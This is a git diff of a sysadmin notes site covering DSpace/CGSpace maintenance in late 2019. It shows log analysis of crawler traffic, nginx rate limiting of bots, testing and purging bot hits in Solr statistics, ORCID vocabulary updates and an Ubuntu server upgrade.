<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#39;(34\.224\.4\.16|34\.234\.204\.152)&#39;
365288
</code></pre><ul>
<li>Their user agent is one I&rsquo;ve never seen before:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)
</code></pre><ul>
<li>Most of them seem to be to community or collection discover and browse results pages like <code>/handle/10568/103/discover</code>:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -o -E &quot;GET /(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
6566 GET /bitstream
351928 GET /handle
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c discover
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c discover
214209
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c browse
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c browse
86874
</code></pre><ul>
<li>As far as I can tell, none of their requests are counted in the Solr statistics:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true&#39;
</code></pre><ul>
<li>Still, those requests are CPU intensive so I will add their user agent to the &ldquo;badbots&rdquo; rate limiting in nginx to reduce the impact on server load</li>
<li>After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:&quot;Amazonbot/0.1&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1/discover&#39; User-Agent:&#34;Amazonbot/0.1&#34;
</code></pre><ul>
<li>On the topic of spiders, I have been wanting to update DSpace&rsquo;s default list of spiders in <code>config/spiders/agents</code>, perhaps by dropping a new list in from <a href="https://github.com/atmire/COUNTER-Robots">Atmire&rsquo;s COUNTER-Robots</a> project
<ul>
@ -210,23 +210,23 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;iskanie&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;iskanie&#34;
</code></pre><ul>
<li>A bit later I checked Solr and found three requests from my IP with that user agent this month:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0'
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0&#39;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;1&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;3&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;1&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;3&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>Now I want to make similar requests with a user agent that is included in DSpace&rsquo;s current user agent list:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;celestial&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;celestial&#34;
</code></pre><ul>
<li>After twenty minutes I didn&rsquo;t see any requests in Solr, so I assume they did not get logged because they matched a bot list&hellip;
<ul>
@ -234,7 +234,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre><code>spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
<pre tabindex="0"><code>spider.agentregex.regexfile = ${dspace.dir}/config/spiders/Bots-2013-03.txt
</code></pre><ul>
<li>Apparently that is part of Atmire&rsquo;s CUA, despite being in a standard DSpace configuration file&hellip;</li>
<li>I tried with some other garbage user agents like &ldquo;fuuuualan&rdquo; and they were visible in Solr
@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre><code>else if (line.hasOption('m'))
<pre tabindex="0"><code>else if (line.hasOption(&#39;m&#39;))
{
SolrLogger.markRobotsByIP();
}
@ -263,34 +263,34 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
<ul>
<li>I added &ldquo;alanfuu2&rdquo; to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu1&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu2&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu1&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu2&#34;
</code></pre><ul>
<li>After committing the changes in Solr I saw one request for &ldquo;alanfuu1&rdquo; and no requests for &ldquo;alanfuu2&rdquo;:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>So basically it seems like a win to update the example file with the latest one from Atmire&rsquo;s COUNTER-Robots list
<ul>
<li>Even though the &ldquo;mark by user agent&rdquo; function is not working (see email to dspace-tech mailing list) DSpace will still not log Solr events from these user agents</li>
</ul>
</li>
<li>I&rsquo;m curious how the special character matching is in Solr, so I will test two requests: one with &ldquo;<a href="http://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="http://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
<li>I&rsquo;m curious how the special character matching is in Solr, so I will test two requests: one with &ldquo;<a href="https://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="https://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnip.com&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnyp.com&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnip.com&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnyp.com&#34;
</code></pre><ul>
<li>Then commit changes to Solr so we don&rsquo;t have to wait:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>So the blocking seems to be working because &ldquo;www.gnip.com&rdquo; is one of the new patterns added to the spiders file&hellip;</li>
</ul>
@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
</ul>
</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;62944&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;62944&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Similar for com.plumanalytics, Grammarly, and ltx71!</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;28256&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;6288&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;105663&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;28256&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;6288&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;105663&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Deleting these seems to work, for example the 105,000 ltx71 records from 2018:</li>
</ul>
<pre><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
<ul>
@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre><code>$ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*' | xmllint --format - | less
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*&#39; | xmllint --format - | less
...
&lt;lst name=&quot;facet_counts&quot;&gt;
&lt;lst name=&quot;facet_queries&quot;/&gt;
&lt;lst name=&quot;facet_fields&quot;&gt;
&lt;lst name=&quot;dateYearMonth&quot;&gt;
&lt;int name=&quot;2019-10&quot;&gt;198624&lt;/int&gt;
&lt;int name=&quot;2019-05&quot;&gt;88422&lt;/int&gt;
&lt;int name=&quot;2019-06&quot;&gt;79911&lt;/int&gt;
&lt;int name=&quot;2019-09&quot;&gt;67065&lt;/int&gt;
&lt;int name=&quot;2019-07&quot;&gt;39026&lt;/int&gt;
&lt;int name=&quot;2019-08&quot;&gt;36889&lt;/int&gt;
&lt;int name=&quot;2019-04&quot;&gt;36512&lt;/int&gt;
&lt;int name=&quot;2019-11&quot;&gt;760&lt;/int&gt;
&lt;lst name=&#34;facet_counts&#34;&gt;
&lt;lst name=&#34;facet_queries&#34;/&gt;
&lt;lst name=&#34;facet_fields&#34;&gt;
&lt;lst name=&#34;dateYearMonth&#34;&gt;
&lt;int name=&#34;2019-10&#34;&gt;198624&lt;/int&gt;
&lt;int name=&#34;2019-05&#34;&gt;88422&lt;/int&gt;
&lt;int name=&#34;2019-06&#34;&gt;79911&lt;/int&gt;
&lt;int name=&#34;2019-09&#34;&gt;67065&lt;/int&gt;
&lt;int name=&#34;2019-07&#34;&gt;39026&lt;/int&gt;
&lt;int name=&#34;2019-08&#34;&gt;36889&lt;/int&gt;
&lt;int name=&#34;2019-04&#34;&gt;36512&lt;/int&gt;
&lt;int name=&#34;2019-11&#34;&gt;760&lt;/int&gt;
&lt;/lst&gt;
&lt;/lst&gt;
</code></pre><ul>
@ -394,7 +394,7 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre><code>$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 stat
<pre tabindex="0"><code>$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 stat
istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do ./check-spider-hits.sh -s $shard -p yes; done
</code></pre><ul>
<li>Open a <a href="https://github.com/atmire/COUNTER-Robots/pull/28">pull request</a> against COUNTER-Robots to remove unnecessary escaping of dashes</li>
@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
</li>
<li>Testing modifying some of the COUNTER-Robots patterns to use <code>[0-9]</code> instead of <code>\d</code> digit character type, as Solr&rsquo;s regex search can&rsquo;t use those</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;Scrapoo/1&quot;
$ http &quot;http://localhost:8081/solr/statistics/update?commit=true&quot;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;Scrapoo/1&#34;
$ http &#34;http://localhost:8081/solr/statistics/update?commit=true&#34;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Nice, so searching with regex in Solr with <code>//</code> syntax works for those digits!</li>
<li>I realized that it&rsquo;s easier to search Solr from curl via POST using this syntax:</li>
</ul>
<pre><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:*Scrapoo*&amp;rows=0&quot;)
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:*Scrapoo*&amp;rows=0&#34;)
</code></pre><ul>
<li>If the parameters include something like &ldquo;[0-9]&rdquo; then curl interprets it as a range and will make ten requests
<ul>
@ -441,7 +441,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
</ul>
</li>
</ul>
<pre><code>$ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select&#39; -d &#39;q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2&#39;
</code></pre><ul>
<li>I updated the <code>check-spider-hits.sh</code> script to use the POST syntax, and I&rsquo;m evaluating the feasability of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling</li>
</ul>
@ -450,7 +450,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -513,7 +513,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Most of the curl hits were from CIAT in mid-2019, where they were using <a href="https://guzzle3.readthedocs.io/http-client/client.html">GuzzleHttp</a> from PHP, which uses something like this for its user agent:</li>
</ul>
<pre><code>Guzzle/&lt;Guzzle_Version&gt; curl/&lt;curl_version&gt; PHP/&lt;PHP_VERSION&gt;
<pre tabindex="0"><code>Guzzle/&lt;Guzzle_Version&gt; curl/&lt;curl_version&gt; PHP/&lt;PHP_VERSION&gt;
</code></pre><ul>
<li>Run system updates on DSpace Test and reboot the server</li>
</ul>
@ -564,7 +564,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>Buck is one I&rsquo;ve never heard of before, its user agent is:</li>
</ul>
<pre><code>Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
<pre tabindex="0"><code>Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
</code></pre><ul>
<li>All in all that&rsquo;s about 85,000 more hits purged, in addition to the 3.4 million I purged last week</li>
</ul>
@ -692,15 +692,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Make sure all packages are up to date and the package manager is up to date, the
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ Make sure all packages are up to date and the package manager is up to date, the
<p class="blog-post-meta">
<time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -142,33 +142,33 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre><code># apt update &amp;&amp; apt full-upgrade
<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
# apt-get autoremove &amp;&amp; apt-get autoclean
# dpkg -C
# reboot
</code></pre><ul>
<li>Take some backups:</li>
</ul>
<pre><code># dpkg -l &gt; 2019-12-01-linode18-dpkg.txt
<pre tabindex="0"><code># dpkg -l &gt; 2019-12-01-linode18-dpkg.txt
# tar czf 2019-12-01-linode18-etc.tar.gz /etc
</code></pre><ul>
<li>Then check all third-party repositories in /etc/apt to see if everything using &ldquo;xenial&rdquo; has packages available for &ldquo;bionic&rdquo; and then update the sources:</li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/' /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/&rsquo; /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li>Pause the Uptime Robot monitoring for CGSpace</li>
<li>Make sure the update manager is installed and do the upgrade:</li>
</ul>
<pre><code># apt install update-manager-core
<pre tabindex="0"><code># apt install update-manager-core
# do-release-upgrade
</code></pre><ul>
<li>After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:</li>
</ul>
<pre><code># apt purge openjdk-11-jre-headless
# apt install 'nginx=1.16.1-1~bionic'
<pre tabindex="0"><code># apt purge openjdk-11-jre-headless
# apt install &#39;nginx=1.16.1-1~bionic&#39;
# reboot
</code></pre><ul>
<li>After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it&rsquo;s working:</li>
</ul>
